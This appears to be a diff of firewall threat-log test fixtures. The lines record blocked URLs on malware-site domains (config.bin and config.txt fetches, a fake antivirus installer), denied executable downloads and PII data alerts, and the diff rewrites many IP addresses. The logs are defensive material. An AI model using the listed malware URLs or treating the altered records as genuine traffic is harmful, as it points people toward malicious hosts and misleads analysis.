-Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
+Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
 Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
 Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:51,192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,
-Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
+Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
 Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,207.46.140.46,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,65.54.71.11,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,89.160.20.156,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,208.85.40.48,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,1.128.3.4,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
+Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
 Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:18:14,192.168.0.2,74.125.239.6,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,208.80.154.225,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,208.80.154.234,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:16:57,65.54.75.25,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,74.125.224.206,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,207.178.96.34,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,74.125.224.195,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:59,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,66.152.109.24,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
-Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,
